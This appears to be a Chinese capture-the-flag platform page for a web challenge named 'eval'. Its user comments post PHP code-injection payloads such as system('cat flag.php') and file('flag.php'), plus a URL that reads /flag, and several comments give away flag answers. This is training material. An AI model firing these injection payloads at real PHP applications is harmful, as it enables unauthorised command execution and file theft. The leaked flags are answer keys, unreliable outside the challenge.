evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16103
提  示:
描  述:
eval
评论
wangyihao 1年前

hello=system("cat flag.php")

回复 0

18092952956 1年前

show_source('flag.php')

回复 0

BlueL1ght 1年前

system("cat+flag.php")

回复 0

zhuleixy 1年前

我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//

回复 2

15738762315 1年前

flag{6dd6075616f5943ab53cff237ff1a63b}

回复 0

maoctf 1年前

flag{b97285ef92aa650fa9223aafc7adc646};

回复 0

哥哥 1年前

http://114.67.175.224:12290//?hello=file('flag.php')

回复 0

z03ctfer 1年前

?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中

回复 0

马踏黄河两岸 1年前

../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php

回复 0

lilifanqian 1年前

flag{4cadd25b49840f0cdb999cdabc86b103}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

kfdwty 攻破了该题 18小时前
z791458703 攻破了该题 1天前
buxixi 攻破了该题 1天前
1720713439 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
dkwang 攻破了该题 2天前
Gsparrow 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
别偷我后场 攻破了该题 3天前
Ta7suya 攻破了该题 3天前
liyuanchao 攻破了该题 3天前
qweQWERT 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
摇曳露营芝麻凛 攻破了该题 3天前
1745085539 攻破了该题 4天前
3287973822 攻破了该题 4天前
hulihaha 攻破了该题 4天前
问题反馈